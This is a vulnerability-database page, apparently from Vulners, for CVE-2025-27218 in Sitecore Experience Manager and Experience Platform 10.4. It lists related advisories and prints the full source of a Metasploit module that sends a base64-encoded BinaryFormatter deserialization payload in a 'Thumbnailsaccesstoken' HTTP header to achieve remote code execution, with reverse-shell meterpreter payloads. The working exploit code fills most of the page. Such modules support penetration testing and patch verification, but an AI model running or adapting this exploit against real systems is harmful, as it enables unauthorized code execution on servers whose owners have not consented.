| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| The vulnerability of the Sitecore Experience Platform (XP) and Sitecore Experience Manager (XM) content management systems, related to improper code generation, allows attackers to execute arbitrary code. | 6 Jan 202600:00 | – | bdu_fstec | |
| CVE-2025-27218 | 20 Feb 202506:41 | – | circl | |
| Sitecore Experience Manager和Experience Platform 安全漏洞 | 20 Feb 202500:00 | – | cnnvd | |
| CVE-2025-27218 | 20 Feb 202500:00 | – | cve | |
| CVE-2025-27218 | 20 Feb 202500:00 | – | cvelist | |
| Sitecore 10.4 - Remote Code Execution (RCE) | 26 Jun 202500:00 | – | exploitdb | |
| Mars: insecure deserilize object leads to RCE On Sitecore (CVE-██████████-27218) | 12 Apr 202514:39 | – | hackerone | |
| Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization | 3 Jul 202613:39 | – | nuclei | |
| CVE-2025-27218 | 20 Feb 202505:15 | – | nvd | |
| Sitecore CVE-2025-27218 BinaryFormatter Deserialization | 28 Mar 202500:00 | – | packetstorm |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Util::DotNetDeserialization
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
'Description' => %q{
This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
},
'License' => MSF_LICENSE,
'Author' => [
'Dylan Pindur', # Discovery
'machang-r7' # Module Creator
],
'References' => [
['CVE', '2025-27218'],
['EDB', '52344'],
['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
],
'DisclosureDate' => '2025-01-06',
'DefaultTarget' => 0,
'Platform' => 'win',
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :windows_command
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager
# tested with windows/x64/meterpreter/reverse_tcp
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
})
if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
CheckCode::Detected('The target is running SiteCore.')
else
CheckCode::Safe('The target does not appear to be running SiteCore.')
end
end
def exploit
case target['Type']
when :windows_command
execute_command(payload.encoded)
when :psh_stager
execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
end
end
def execute_command(cmd, _opts = {})
sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :WindowsIdentity,
formatter: :BinaryFormatter
))
# Build HTTP request with malicious header
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'headers' => {
'Thumbnailsaccesstoken' => sploit
}
})
if res && res.code == 200
print_good('Server responded with 200, this probably means it worked.')
else
print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation